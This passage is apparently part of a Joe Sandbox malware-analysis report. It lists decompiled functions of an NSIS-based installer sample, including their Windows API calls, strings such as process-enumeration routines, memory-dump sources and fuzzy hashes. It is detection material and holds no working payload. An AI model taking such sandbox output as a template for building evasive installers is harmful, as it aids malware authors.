                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID: F$A
                                                                                                                                                                                                                                                                                        • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                        • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                        Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                        Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                        • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                        Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                        Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                        Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                        • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                        Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                        • String ID: F$N$open
                                                                                                                                                                                                                                                                                        • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                        Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
